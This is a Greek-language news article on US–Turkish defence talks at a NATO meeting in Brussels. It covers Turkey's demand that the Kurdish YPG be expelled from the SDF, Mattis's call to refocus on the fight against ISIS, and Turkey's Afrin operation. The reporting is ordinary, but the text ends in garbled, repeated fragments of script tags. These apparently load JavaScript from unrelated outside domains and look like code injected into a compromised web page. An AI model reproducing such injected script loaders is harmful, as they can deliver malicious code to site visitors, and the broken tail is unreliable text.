Η Άγκυρα ζητάει από την Ουάσινγκτον να διακόψει τις σχέσεις με τους Κούρδους – ΗΠΑ στην Άγκυρα: Επικεντρωθείτε στον πόλεμο κατά του ISIS στη Συρία

Αποτέλεσμα εικόνας για Η Άγκυρα ζητάει από την Ουάσινγκτον να διακόψει τις σχέσεις της με τους Κούρδους

Η Άγκυρα ζητάει από την Ουάσινγκτον να διακόψει τις σχέσεις της με τους Κούρδους

Μάλιστα, η Άγκυρα επισημαίνει στην Ουάσινγκτον πως οι YPG πρέπει να εκδιωχθούν από τις Συριακές Δημοκρατικές Δυνάμεις (SDF), τον συνασπισμό που έχει δημιουργηθεί για την καταπολέμηση του ISIS

Ο τούρκος υπουργός Άμυνας δήλωσε σήμερα πως είπε στον αμερικανό ομόλογό του, τον Τζιμ Μάτις, ότι η πολιτοφυλακή YPG των Κούρδων της Συρίας θα πρέπει να εκδιωχθεί από τις Συριακές Δημοκρατικές Δυνάμεις (SDF), την πολιτοφυλακή που υποστηρίζει η Ουάσινγκτον στη μάχη εναντίον του Ισλαμικού Κράτους.

Ο Νουρετίν Τζανικλί δήλωσε επίσης, ενημερώνοντας τους δημοσιογράφους στις Βρυξέλλες αφού συναντήθηκε με τον αμερικανό υπουργό Άμυνας, πως αμφισβήτησε τη δήλωση του Μάτις ότι στις SDF κυριαρχούν οι Άραβες, λέγοντας πως η δύναμη ελέγχεται πλήρως από την YPG.

Τα σχόλιά του μεταδόθηκαν απ’ ευθείας από την τουρκική τηλεόραση.

Ο Τζιμ Μάτις, ο οποίος είχε συναντηθεί χθες Τετάρτη με τον τούρκο ομόλογό του, δήλωσε από την πλευρά του ότι οι ΗΠΑ και η Τουρκίασύμμαχοι στο ΝΑΤΟ, θα συνεχίσουν τη συνεργασία τους στη Συρία παρά τις διαφορές τους.

«Πιστεύω ότι βρίσκουμε κοινό έδαφοςκαι υπάρχουν περιοχές μη κοινού εδάφους, όπου μερικές φορές ο πόλεμος σου προσφέρει μόνο κακές επιλογές», δήλωσε ο αμερικανός υπουργός Άμυνας μιλώντας σε δημοσιογράφους στο περιθώριο συνάντησης του ΝΑΤΟ.

«Όμως αυτό που έχει σηματοδοτήσει την επικοινωνία μας είναι η απόλυτη εντιμότητα και διαφάνεια μεταξύ μας… Συνεχίζουμε να συνεργαζόμαστε για να βρούμε τρόπους να εξασφαλίσουμε ότι οι θεμιτές ανησυχίες τους θα απαντηθούν», πρόσθεσε ο Μάτις.

 

Μήνυμα ΗΠΑ στην Άγκυρα: Επικεντρωθείτε στον πόλεμο κατά του ISIS στη Συρία

Ο Αμερικανός υπουργός Άμυνας Τζιμ Μάτις συναντήθηκε με τον Τούρκο ομόλογό του στο περιθώριο της συνόδου του ΝΑΤΟ στις Βρυξέλλες και του ζήτησε η Άγκυρα να παραμείνει επικεντρωμένη στον πόλεμο εναντίον του Ισλαμικού Κράτους στη Συρία, ανακοίνωσε σήμερα το Πεντάγωνο.

“(Ο Μάτις) ζήτησε να επικεντρωθεί ξανά η προσοχή στην εκστρατεία καταπολέμησης του ΙΚ και να αποφευχθεί η αναδιοργάνωση στη Συρία οποιουδήποτε κομματιού της τρομοκρατικής οργάνωσης”, τόνιζε η ανακοίνωση, όπως μεταδίδει το Reuters και αναμεταδίδει το Αθηναϊκό Πρακτορείο Ειδήσεων.

Η Τουρκία ξεκίνησε τον Ιανουάριο μια εκστρατεία στην περιοχή Αφρίν της βόρειας Συρίας με στόχο την εκδίωξη της κουρδικής πολιτοφυλακής Μονάδες Προστασίας του Λαού (YPG) από τα νότια σύνορά της. Ωστόσο η YPG είναι σύμμαχος των ΗΠΑ στη μάχη τους κατά του ΙΚ.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>